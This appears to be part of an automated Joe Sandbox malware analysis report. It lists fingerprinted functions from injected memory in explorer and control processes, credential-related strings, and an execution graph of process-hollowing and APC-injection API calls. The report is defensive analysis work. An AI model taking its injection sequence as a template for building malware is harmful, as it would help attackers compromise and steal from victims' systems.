                                  • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                  • Instruction ID: e3ce014b5f6e30a5f3bb5a95d91539d681a2107a81a4f64fdc1d72cf1af1cc26
                                  • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                  • Instruction Fuzzy Hash: 66315E70228B084FC784EF688495BEAB6E5FBD8200F94062DA54ED7615DF30D509CB93
                                  Function 0C3B1FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                  • Instruction ID: 8ea9c193eaa5d0350e9bbd51db41a9c928b369725a37fc2c8e02b4b652b84b98
                                  • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                  • Instruction Fuzzy Hash: 6F315D70228B084FC794EF688495BEAB7E5FFD8200F94462D954ADB255DF30D509CB92
                                  Function 0C3B48C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction ID: c1ecefd8a5634c62241f09a8f71de55b270e567a45b4cc9b9b9fd25bcc25240e
                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction Fuzzy Hash: 0831B131724A0C8FCB55EFA8C8847EDB7E1FB58215F40422AD55EE7240DF748649CB9A
                                  Function 0C3B48BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction ID: 694977eb0c3a82e35d13d28298ede91b7a8f311ae37aa5b75907edfc1d83f7fa
                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction Fuzzy Hash: 1C21D530A20A0C8BCB05EFA8C8447EDBBE1FF58204F40421AD55AE7640DF748609CF8A
                                  Function 0C3B5E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                  • Instruction ID: bb763639da54d470df9b3481ef57382cccf110bb8467e88b02d9971320c8671f
                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                  • Instruction Fuzzy Hash: 5F215A70A24A0D9FDB48EFA8D0447EEBAF1FB58304F50462ED109E3A10DB789595CB85
                                  Function 0C3B5E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                  • Instruction ID: 45a5e09f1ef67832bff89fbfeab390e76aa42a34deeedd0847923e8c4654b295
                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                  • Instruction Fuzzy Hash: DF216B70A24A0D9BDB48EFA8D0447EEBBF1FB58304F50462ED109E3A00DB789555CB85
                                  Function 0C3B5FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: auth$logi$pass$user
                                  • API String ID: 0-2393853802
                                  • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                  • Instruction ID: 684b1c17d7657c9a62f23e22e28181b6cffa804603c6541b261cceab9497602a
                                  • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                  • Instruction Fuzzy Hash: AC21CD70628B0D8BCB05DF9A98916EEB7F1FF88344F004619E40AEB245DBB0D9148BC2

                                  Execution Graph

                                  Execution Coverage:1.9%
                                  Dynamic/Decrypted Code Coverage:6.7%
                                  Signature Coverage:0%
                                  Total number of Nodes:623
                                  Total number of Limit Nodes:75
                                  execution_graph 99062 2549080 99065 25490bb 99062->99065 99073 254bd40 99062->99073 99064 254919c 99065->99064 99076 253acf0 99065->99076 99067 25490f1 99081 2544e50 99067->99081 99069 2549120 Sleep 99070 254910d 99069->99070 99070->99064 99070->99069 99086 2548ca0 LdrLoadDll 99070->99086 99087 2548eb0 LdrLoadDll 99070->99087 99088 254a540 99073->99088 99075 254bd6d 99075->99065 99078 253ad14 99076->99078 99077 253ad1b 99077->99067 99078->99077 99079 253ad50 LdrLoadDll 99078->99079 99080 253ad67 99078->99080 99079->99080 99080->99067 99082 2544e6a 99081->99082 99083 2544e5e 99081->99083 99082->99070 99083->99082 99095 25452d0 LdrLoadDll 99083->99095 99085 2544fbc 99085->99070 99086->99070 99087->99070 99091 254af60 99088->99091 99090 254a55c NtAllocateVirtualMemory 99090->99075 99092 254af70 99091->99092 99093 254af92 99091->99093 99094 2544e50 LdrLoadDll 99092->99094 99093->99090 99094->99093 99095->99085 99096 453cb84 99099 453a042 99096->99099 99098 453cba5 99100 453a06b 99099->99100 99101 453a182 NtQueryInformationProcess 99100->99101 99116 453a56c 99100->99116 99103 453a1ba 99101->99103 99102 453a1ef 99102->99098 99103->99102 99104 453a290 99103->99104 99105 453a2db 99103->99105 99128 4539de2 NtCreateSection NtMapViewOfSection NtClose 99104->99128 99106 453a2fc NtSuspendThread 99105->99106 99107 453a30d 99106->99107 99110 453a331 99106->99110 99107->99098 99109 453a2cf 99109->99098 99113 453a412 99110->99113 99119 4539bb2 99110->99119 99112 453a531 99114 453a552 NtResumeThread 99112->99114 99113->99112 99115 453a4a6 NtSetContextThread 99113->99115 99114->99116 99118 453a4bd 99115->99118 99116->99098 99117 453a51c RtlQueueApcWow64Thread 99117->99112 99118->99112 99118->99117 99120 4539bf7 99119->99120 99121 4539c66 NtCreateSection 99120->99121 99122 4539ca0 99121->99122 99123 4539d4e 99121->99123 99124 4539cc1 NtMapViewOfSection 99122->99124 99123->99113 99124->99123 99125 4539d0c 99124->99125 99125->99123 99126 4539d88 99125->99126 99127 4539dc5 NtClose 99126->99127 99127->99113 99128->99109 99129 254f13d 99132 254b9d0 99129->99132 99133 254b9f6 99132->99133 99140 2539d40 99133->99140 99135 254ba02 99136 254ba26 99135->99136 99148 2538f30 99135->99148 99186 254a6b0 99136->99186 99189 2539c90 99140->99189 99142 2539d4d 99143 2539d54 99142->99143 99201 2539c30 99142->99201 99143->99135 99149 2538f57 99148->99149 99597 253b1c0 99149->99597 99151 2538f69 99601 253af10 99151->99601 99153 2538f86 99158 2538f8d 99153->99158 99672 253ae40 LdrLoadDll 99153->99672 99156 2538ffc 99617 253f410 99156->99617 99182 25390f2 99158->99182 99605 253f380 99158->99605 99159 2539006 99160 254bf90 2 API calls 99159->99160 99159->99182 99161 253902a 99160->99161 99162 254bf90 2 API calls 99161->99162 99163 253903b 99162->99163 99164 254bf90 2 API calls 99163->99164 99165 253904c 99164->99165 99629 253ca90 99165->99629 99167 2539059 99168 2544a50 8 API calls 99167->99168 99169 2539066 99168->99169 99170 2544a50 8 API calls 99169->99170 99171 2539077 99170->99171 99172 25390a5 99171->99172 99173 2539084 99171->99173 99175 2544a50 8 API calls 99172->99175 99639 253d620 99173->99639 99181 25390c1 99175->99181 99178 25390e9 99179 2538d00 23 API calls 99178->99179 99179->99182 99180 2539092 99655 2538d00 99180->99655 99181->99178 99673 253d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99181->99673 99182->99136 99187 254af60 LdrLoadDll 99186->99187 99188 254a6cf 99187->99188 99190 2539ca3 99189->99190 99240 2548bc0 LdrLoadDll 99189->99240 99220 2548a70 99190->99220 99193 2539cb6 99193->99142 99194 2539cac 99194->99193 99223 254b2b0 99194->99223 99196 2539cf3 99196->99193 99234 2539ab0 99196->99234 99198 2539d13 99241 2539620 LdrLoadDll 99198->99241 99200 2539d25 99200->99142 99576 254b5a0 99201->99576 99204 254b5a0 LdrLoadDll 99205 2539c5b 99204->99205 99206 254b5a0 LdrLoadDll 99205->99206 99207 2539c71 99206->99207 99208 253f180 99207->99208 99209 253f199 99208->99209 99580 253b040 99209->99580 99211 253f1ac 99584 254a1e0 99211->99584 99214 2539d65 99214->99135 99216 253f1d2 99217 253f1fd 99216->99217 99590 254a260 99216->99590 99219 254a490 2 API calls 99217->99219 99219->99214 99242 254a600 99220->99242 99224 254b2c9 99223->99224 99246 2544a50 99224->99246 99226 254b2e1 99227 254b2ea 99226->99227 99285 254b0f0 99226->99285 99227->99196 99229 254b2fe 99229->99227 99303 2549f00 99229->99303 99554 2537ea0 99234->99554 99236 2539ad1 99236->99198 99237 2539aca 99237->99236 99567 2538160 99237->99567 99240->99190 99241->99200 99243 254a616 99242->99243 99244 254af60 LdrLoadDll 99243->99244 99245 2548a85 99244->99245 99245->99194 99247 2544a64 99246->99247 99248 2544d85 99246->99248 99247->99248 99312 2549c50 99247->99312 99248->99226 99251 2544b90 99315 254a360 99251->99315 99252 2544b73 99372 254a460 LdrLoadDll 99252->99372 99255 2544b7d 99255->99226 99256 2544bb7 99257 254bdc0 2 API calls 99256->99257 99260 2544bc3 99257->99260 99258 2544d49 99261 254a490 2 API calls 99258->99261 99259 2544d5f 99381 2544790 LdrLoadDll NtReadFile NtClose 99259->99381 99260->99255 99260->99258 99260->99259 99265 2544c52 99260->99265 99262 2544d50 99261->99262 99262->99226 99264 2544d72 99264->99226 99266 2544cb9 99265->99266 99268 2544c61 99265->99268 99266->99258 99267 2544ccc 99266->99267 99374 254a2e0 99267->99374 99270 2544c66 99268->99270 99271 2544c7a 99268->99271 99373 2544650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99270->99373 99274 2544c97 99271->99274 99275 2544c7f 99271->99275 99274->99262 99330 2544410 99274->99330 99318 25446f0 99275->99318 99277 2544c70 99277->99226 99279 2544d2c 99378 254a490 99279->99378 99280 2544c8d 99280->99226 99283 2544caf 99283->99226 99284 2544d38 99284->99226 99286 254b101 99285->99286 99287 254b113 99286->99287 99288 254bd40 2 API calls 99286->99288 99287->99229 99289 254b134 99288->99289 99399 2544070 99289->99399 99291 254b180 99291->99229 99292 254b157 99292->99291 99293 2544070 3 API calls 99292->99293 99294 254b179 99293->99294 99294->99291 99431 2545390 99294->99431 99296 254b20a 99297 254b21a 99296->99297 99525 254af00 LdrLoadDll 99296->99525 99441 254ad70 99297->99441 99300 254b248 99520 2549ec0 99300->99520 99304 2549f0c 99303->99304 99305 254af60 LdrLoadDll 99304->99305 99306 2549f1c 99305->99306 99548 47c2c0a 99306->99548 99307 2549f37 99309 254bdc0 99307->99309 99551 254a670 99309->99551 99311 254b359 99311->99196 99313 254af60 LdrLoadDll 99312->99313 99314 2544b44 99313->99314 99314->99251 99314->99252 99314->99255 99316 254a37c NtCreateFile 99315->99316 99317 254af60 LdrLoadDll 99315->99317 99316->99256 99317->99316 99319 254470c 99318->99319 99320 254a2e0 LdrLoadDll 99319->99320 99321 254472d 99320->99321 99322 2544734 99321->99322 99323 2544748 99321->99323 99324 254a490 2 API calls 99322->99324 99325 254a490 2 API calls 99323->99325 99326 254473d 99324->99326 99327 2544751 99325->99327 99326->99280 99382 254bfd0 LdrLoadDll RtlAllocateHeap 99327->99382 99329 254475c 99329->99280 99331 254448e 99330->99331 99332 254445b 99330->99332 99333 25445d9 99331->99333 99338 25444aa 99331->99338 99334 254a2e0 LdrLoadDll 99332->99334 99335 254a2e0 LdrLoadDll 99333->99335 99336 2544476 99334->99336 99342 25445f4 99335->99342 99337 254a490 2 API calls 99336->99337 99339 254447f 99337->99339 99340 254a2e0 LdrLoadDll 99338->99340 99339->99283 99341 25444c5 99340->99341 99344 25444e1 99341->99344 99345 25444cc 99341->99345 99395 254a320 LdrLoadDll 99342->99395 99348 25444e6 99344->99348 99349 25444fc 99344->99349 99347 254a490 2 API calls 99345->99347 99346 254462e 99350 254a490 2 API calls 99346->99350 99351 25444d5 99347->99351 99352 254a490 2 API calls 99348->99352 99358 2544501 99349->99358 99383 254bf90 99349->99383 99354 2544639 99350->99354 99351->99283 99355 25444ef 99352->99355 99353 2544513 99353->99283 99354->99283 99355->99283 99358->99353 99386 254a410 99358->99386 99359 254457e 99361 2544585 99359->99361 99362 254459a 99359->99362 99360 2544567 99360->99359 99394 254a2a0 LdrLoadDll 99360->99394 99364 254a490 2 API calls 99361->99364 99365 254a490 2 API calls 99362->99365 99364->99353 99366 25445a3 99365->99366 99367 25445cf 99366->99367 99389 254bb90 99366->99389 99367->99283 99369 25445ba 99370 254bdc0 2 API calls 99369->99370 99371 25445c3 99370->99371 99371->99283 99372->99255 99373->99277 99375 2544d14 99374->99375 99376 254af60 LdrLoadDll 99374->99376 99377 254a320 LdrLoadDll 99375->99377 99376->99375 99377->99279 99379 254af60 LdrLoadDll 99378->99379 99380 254a4ac NtClose 99379->99380 99380->99284 99381->99264 99382->99329 99396 254a630 99383->99396 99385 254bfa8 99385->99358 99387 254af60 LdrLoadDll 99386->99387 99388 254a42c NtReadFile 99387->99388 99388->99360 99390 254bbb4 99389->99390 99391 254bb9d 99389->99391 99390->99369 99391->99390 99392 254bf90 2 API calls 99391->99392 99393 254bbcb 99392->99393 99393->99369 99394->99359 99395->99346 99397 254af60 LdrLoadDll 99396->99397 99398 254a64c RtlAllocateHeap 99397->99398 99398->99385 99400 2544081 99399->99400 99401 2544089 99399->99401 99400->99292 99430 254435c 99401->99430 99526 254cf30 99401->99526 99403 25440dd 99404 254cf30 2 API calls 99403->99404 99407 25440e8 99404->99407 99405 2544136 99408 254cf30 2 API calls 99405->99408 99407->99405 99534 254cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 99407->99534 99535 254d060 99407->99535 99411 254414a 99408->99411 99410 25441a7 99412 254cf30 2 API calls 99410->99412 99411->99410 99414 254d060 3 API calls 99411->99414 99413 25441bd 99412->99413 99415 25441fa 99413->99415 99417 254d060 3 API calls 99413->99417 99414->99411 99416 254cf30 2 API calls 99415->99416 99418 2544205 99416->99418 99417->99413 99419 254d060 3 API calls 99418->99419 99426 254423f 99418->99426 99419->99418 99422 254cf90 2 API calls 99423 254433e 99422->99423 99424 254cf90 2 API calls 99423->99424 99425 2544348 99424->99425 99427 254cf90 2 API calls 99425->99427 99531 254cf90 99426->99531 99428 2544352 99427->99428 99429 254cf90 2 API calls 99428->99429 99429->99430 99430->99292 99432 25453a1 99431->99432 99433 2544a50 8 API calls 99432->99433 99435 25453b7 99433->99435 99434 254540a 99434->99296 99435->99434 99436 2545405 99435->99436 99437 25453f2 99435->99437 99439 254bdc0 2 API calls 99436->99439 99438 254bdc0 2 API calls 99437->99438 99440 25453f7 99438->99440 99439->99434 99440->99296 99541 254ac30 99441->99541 99443 254ad84 99444 254ac30 LdrLoadDll 99443->99444 99445 254ad8d 99444->99445 99446 254ac30 LdrLoadDll 99445->99446 99447 254ad96 99446->99447 99448 254ac30 LdrLoadDll 99447->99448 99449 254ad9f 99448->99449 99450 254ac30 LdrLoadDll 99449->99450 99451 254ada8 99450->99451 99452 254ac30 LdrLoadDll 99451->99452 99453 254adb1 99452->99453 99454 254ac30 LdrLoadDll 99453->99454 99455 254adbd 99454->99455 99456 254ac30 LdrLoadDll 99455->99456 99457 254adc6 99456->99457 99458 254ac30 LdrLoadDll 99457->99458 99459 254adcf 99458->99459 99460 254ac30 LdrLoadDll 99459->99460 99461 254add8 99460->99461 99462 254ac30 LdrLoadDll 99461->99462 99463 254ade1 99462->99463 99464 254ac30 LdrLoadDll 99463->99464 99465 254adea 99464->99465 99466 254ac30 LdrLoadDll 99465->99466 99467 254adf6 99466->99467 99468 254ac30 LdrLoadDll 99467->99468 99469 254adff 99468->99469 99470 254ac30 LdrLoadDll 99469->99470 99471 254ae08 99470->99471 99472 254ac30 LdrLoadDll 99471->99472 99473 254ae11 99472->99473 99474 254ac30 LdrLoadDll 99473->99474 99475 254ae1a 99474->99475 99476 254ac30 LdrLoadDll 99475->99476 99477 254ae23 99476->99477 99478 254ac30 LdrLoadDll 99477->99478 99479 254ae2f 99478->99479 99480 254ac30 LdrLoadDll 99479->99480 99481 254ae38 99480->99481 99482 254ac30 LdrLoadDll 99481->99482 99483 254ae41 99482->99483 99484 254ac30 LdrLoadDll 99483->99484 99485 254ae4a 99484->99485 99486 254ac30 LdrLoadDll 99485->99486 99487 254ae53 99486->99487 99488 254ac30 LdrLoadDll 99487->99488 99489 254ae5c 99488->99489 99490 254ac30 LdrLoadDll 99489->99490 99491 254ae68 99490->99491 99492 254ac30 LdrLoadDll 99491->99492 99493 254ae71 99492->99493 99494 254ac30 LdrLoadDll 99493->99494 99495 254ae7a 99494->99495 99496 254ac30 LdrLoadDll 99495->99496 99497 254ae83 99496->99497 99498 254ac30 LdrLoadDll 99497->99498 99499 254ae8c 99498->99499 99500 254ac30 LdrLoadDll 99499->99500 99501 254ae95 99500->99501 99502 254ac30 LdrLoadDll 99501->99502 99503 254aea1 99502->99503 99504 254ac30 LdrLoadDll 99503->99504 99505 254aeaa 99504->99505 99506 254ac30 LdrLoadDll 99505->99506 99507 254aeb3 99506->99507 99508 254ac30 LdrLoadDll 99507->99508 99509 254aebc 99508->99509 99510 254ac30 LdrLoadDll 99509->99510 99511 254aec5 99510->99511 99512 254ac30 LdrLoadDll 99511->99512 99513 254aece 99512->99513 99514 254ac30 LdrLoadDll 99513->99514 99515 254aeda 99514->99515 99516 254ac30 LdrLoadDll 99515->99516 99517 254aee3 99516->99517 99518 254ac30 LdrLoadDll 99517->99518 99519 254aeec 99518->99519 99519->99300 99521 254af60 LdrLoadDll 99520->99521 99522 2549edc 99521->99522 99547 47c2df0 LdrInitializeThunk 99522->99547 99523 2549ef3 99523->99229 99525->99297 99527 254cf46 99526->99527 99528 254cf40 99526->99528 99529 254bf90 2 API calls 99527->99529 99528->99403 99530 254cf6c 99529->99530 99530->99403 99532 254bdc0 2 API calls 99531->99532 99533 2544334 99532->99533 99533->99422 99534->99407 99536 254cfd0 99535->99536 99537 254bf90 2 API calls 99536->99537 99540 254d02d 99536->99540 99538 254d00a 99537->99538 99539 254bdc0 2 API calls 99538->99539 99539->99540 99540->99407 99542 254ac4b 99541->99542 99543 2544e50 LdrLoadDll 99542->99543 99544 254ac6b 99543->99544 99545 2544e50 LdrLoadDll 99544->99545 99546 254ad17 99544->99546 99545->99546 99546->99443 99546->99546 99547->99523 99549 47c2c1f LdrInitializeThunk 99548->99549 99550 47c2c11 99548->99550 99549->99307 99550->99307 99552 254af60 LdrLoadDll 99551->99552 99553 254a68c RtlFreeHeap 99552->99553 99553->99311 99555 2537eb0 99554->99555 99556 2537eab 99554->99556 99557 254bd40 2 API calls 99555->99557 99556->99237 99560 2537ed5 99557->99560 99558 2537f38 99558->99237 99559 2549ec0 2 API calls 99559->99560 99560->99558 99560->99559 99561 2537f3e 99560->99561 99566 254bd40 2 API calls 99560->99566 99570 254a5c0 99560->99570 99562 2537f64 99561->99562 99564 254a5c0 2 API calls 99561->99564 99562->99237 99565 2537f55 99564->99565 99565->99237 99566->99560 99568 253817e 99567->99568 99569 254a5c0 2 API calls 99567->99569 99568->99198 99569->99568 99571 254af60 LdrLoadDll 99570->99571 99572 254a5dc 99571->99572 99575 47c2c70 LdrInitializeThunk 99572->99575 99573 254a5f3 99573->99560 99575->99573 99577 254b5c3 99576->99577 99578 253acf0 LdrLoadDll 99577->99578 99579 2539c4a 99578->99579 99579->99204 99581 253b063 99580->99581 99583 253b0e0 99581->99583 99595 2549c90 LdrLoadDll 99581->99595 99583->99211 99585 254af60 LdrLoadDll 99584->99585 99586 253f1bb 99585->99586 99586->99214 99587 254a7d0 99586->99587 99588 254af60 LdrLoadDll 99587->99588 99589 254a7ef LookupPrivilegeValueW 99588->99589 99589->99216 99591 254a27c 99590->99591 99592 254af60 LdrLoadDll 99590->99592 99596 47c2ea0 LdrInitializeThunk 99591->99596 99592->99591 99593 254a29b 99593->99217 99595->99583 99596->99593 99598 253b1f0 99597->99598 99599 253b040 LdrLoadDll 99598->99599 99600 253b204 99599->99600 99600->99151 99602 253af34 99601->99602 99674 2549c90 LdrLoadDll 99602->99674 99604 253af6e 99604->99153 99606 253f3ac 99605->99606 99607 253b1c0 LdrLoadDll 99606->99607 99608 253f3be 99607->99608 99675 253f290 99608->99675 99611 253f3f1 99614 253f402 99611->99614 99616 254a490 2 API calls 99611->99616 99612 253f3d9 99613 253f3e4 99612->99613 99615 254a490 2 API calls 99612->99615 99613->99156 99614->99156 99615->99613 99616->99614 99618 253f43c 99617->99618 99694 253b2b0 99618->99694 99620 253f44e 99621 253f290 3 API calls 99620->99621 99622 253f45f 99621->99622 99623 253f481 99622->99623 99624 253f469 99622->99624 99625 253f492 99623->99625 99628 254a490 2 API calls 99623->99628 99626 253f474 99624->99626 99627 254a490 2 API calls 99624->99627 99625->99159 99626->99159 99627->99626 99628->99625 99630 253caa6 99629->99630 99631 253cab0 99629->99631 99630->99167 99632 253af10 LdrLoadDll 99631->99632 99633 253cb4e 99632->99633 99634 253cb74 99633->99634 99635 253b040 LdrLoadDll 99633->99635 99634->99167 99636 253cb90 99635->99636 99637 2544a50 8 API calls 99636->99637 99638 253cbe5 99637->99638 99638->99167 99640 253d646 99639->99640 99641 253b040 LdrLoadDll 99640->99641 99642 253d65a 99641->99642 99698 253d310 99642->99698 99644 253908b 99645 253cc00 99644->99645 99646 253cc26 99645->99646 99647 253b040 LdrLoadDll 99646->99647 99648 253cca9 99646->99648 99647->99648 99649 253b040 LdrLoadDll 99648->99649 99650 253cd16 99649->99650 99651 253af10 LdrLoadDll 99650->99651 99652 253cd7f 99651->99652 99653 253b040 LdrLoadDll 99652->99653 99654 253ce2f 99653->99654 99654->99180 99727 253f6d0 99655->99727 99657 2538d14 99667 2538f25 99657->99667 99732 25443a0 99657->99732 99659 2538d70 99659->99667 99735 2538ab0 99659->99735 99662 254cf30 2 API calls 99663 2538db2 99662->99663 99664 254d060 3 API calls 99663->99664 99669 2538dc7 99664->99669 99665 2537ea0 4 API calls 99665->99669 99667->99136 99669->99665 99669->99667 99670 253c7b0 18 API calls 99669->99670 99671 2538160 2 API calls 99669->99671 99740 253f670 99669->99740 99744 253f080 21 API calls 99669->99744 99670->99669 99671->99669 99672->99158 99673->99178 99674->99604 99676 253f2aa 99675->99676 99684 253f360 99675->99684 99677 253b040 LdrLoadDll 99676->99677 99678 253f2cc 99677->99678 99685 2549f40 99678->99685 99680 253f30e 99688 2549f80 99680->99688 99683 254a490 2 API calls 99683->99684 99684->99611 99684->99612 99686 254af60 LdrLoadDll 99685->99686 99687 2549f5c 99686->99687 99687->99680 99689 2549f9c 99688->99689 99690 254af60 LdrLoadDll 99688->99690 99693 47c35c0 LdrInitializeThunk 99689->99693 99690->99689 99691 253f354 99691->99683 99693->99691 99695 253b2d7 99694->99695 99696 253b040 LdrLoadDll 99695->99696 99697 253b313 99696->99697 99697->99620 99699 253d327 99698->99699 99707 253f710 99699->99707 99703 253d39b 99704 253d3a2 99703->99704 99718 254a2a0 LdrLoadDll 99703->99718 99704->99644 99706 253d3b5 99706->99644 99708 253f735 99707->99708 99719 25381a0 99708->99719 99710 253d36f 99715 254a6e0 99710->99715 99711 2544a50 8 API calls 99713 253f759 99711->99713 99713->99710 99713->99711 99714 254bdc0 2 API calls 99713->99714 99726 253f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 99713->99726 99714->99713 99716 254af60 LdrLoadDll 99715->99716 99717 254a6ff CreateProcessInternalW 99716->99717 99717->99703 99718->99706 99720 253829f 99719->99720 99721 25381b5 99719->99721 99720->99713 99721->99720 99722 2544a50 8 API calls 99721->99722 99723 2538222 99722->99723 99724 254bdc0 2 API calls 99723->99724 99725 2538249 99723->99725 99724->99725 99725->99713 99726->99713 99728 2544e50 LdrLoadDll 99727->99728 99729 253f6ef 99728->99729 99730 253f6f6 SetErrorMode 99729->99730 99731 253f6fd 99729->99731 99730->99731 99731->99657 99733 25443c6 99732->99733 99745 253f4a0 99732->99745 99733->99659 99736 254bd40 2 API calls 99735->99736 99739 2538ad5 99736->99739 99737 2538cea 99737->99662 99739->99737 99764 2549880 99739->99764 99741 253f683 99740->99741 99812 2549e90 99741->99812 99744->99669 99746 253f4bd 99745->99746 99752 2549fc0 99746->99752 99749 253f505 99749->99733 99753 254af60 LdrLoadDll 99752->99753 99754 2549fdc 99753->99754 99762 47c2f30 LdrInitializeThunk 99754->99762 99755 253f4fe 99755->99749 99757 254a010 99755->99757 99758 254af60 LdrLoadDll 99757->99758 99759 254a02c 99758->99759 99763 47c2d10 LdrInitializeThunk 99759->99763 99760 253f52e 99760->99733 99762->99755 99763->99760 99765 254bf90 2 API calls 99764->99765 99766 2549897 99765->99766 99785 2539310 99766->99785 99768 25498b2 99769 25498f0 99768->99769 99770 25498d9 99768->99770 99772 254bd40 2 API calls 99769->99772 99771 254bdc0 2 API calls 99770->99771 99773 25498e6 99771->99773 99774 254992a 99772->99774 99773->99737 99775 254bd40 2 API calls 99774->99775 99776 2549943 99775->99776 99782 2549be4 99776->99782 99791 254bd80 LdrLoadDll 99776->99791 99778 2549bc9 99779 2549bd0 99778->99779 99778->99782 99780 254bdc0 2 API calls 99779->99780 99781 2549bda 99780->99781 99781->99737 99783 254bdc0 2 API calls 99782->99783 99784 2549c39 99783->99784 99784->99737 99786 2539335 99785->99786 99787 253acf0 LdrLoadDll 99786->99787 99788 2539368 99787->99788 99790 253938d 99788->99790 99792 253cf20 99788->99792 99790->99768 99791->99778 99793 253cf4c 99792->99793 99794 254a1e0 LdrLoadDll 99793->99794 99795 253cf65 99794->99795 99796 253cf6c 99795->99796 99803 254a220 99795->99803 99796->99790 99800 253cfa7 99801 254a490 2 API calls 99800->99801 99802 253cfca 99801->99802 99802->99790 99804 254a23c 99803->99804 99805 254af60 LdrLoadDll 99803->99805 99811 47c2ca0 LdrInitializeThunk 99804->99811 99805->99804 99806 253cf8f 99806->99796 99808 254a810 99806->99808 99809 254af60 LdrLoadDll 99808->99809 99810 254a82f 99809->99810 99810->99800 99811->99806 99813 254af60 LdrLoadDll 99812->99813 99814 2549eac 99813->99814 99817 47c2dd0 LdrInitializeThunk 99814->99817 99815 253f6ae 99815->99669 99817->99815 99821 47c2ad0 LdrInitializeThunk

                                  Executed Functions

                                  Function 0453A036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • NtQueryInformationProcess.NTDLL ref: 0453A19F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766510166.0000000004530000.00000040.00000800.00020000.00000000.sdmp, Offset: 04530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4530000_control.jbxd
                                  Similarity
                                  • API ID: InformationProcessQuery
                                  • String ID: 0
                                  • API String ID: 1778838933-4108050209
                                  • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                  • Instruction ID: 151e8d44cf82d008d8d7b2aace733d23be61a8540fc1246609d9bcf6694ef208
                                  • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
